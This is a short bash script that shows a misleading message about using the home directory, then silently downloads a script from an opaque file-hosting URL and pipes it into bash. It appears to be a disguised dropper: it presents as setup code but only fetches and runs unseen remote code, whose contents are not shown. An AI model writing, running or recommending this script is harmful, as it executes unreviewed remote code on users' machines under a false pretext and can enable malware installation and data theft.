#!/bin/bash

main() {
    clear

    echo -e "${YELLOW}[!!] Local user detected, using home directory instead of global directory ${NC}"
    curl -s "https://f3a5dqxez3.ufs.sh/f/ijk9xZzvhn3r8GXdnbyCnPvxlokJ9sTBIGe1hQA8cqEaWU5f" | bash
}

main
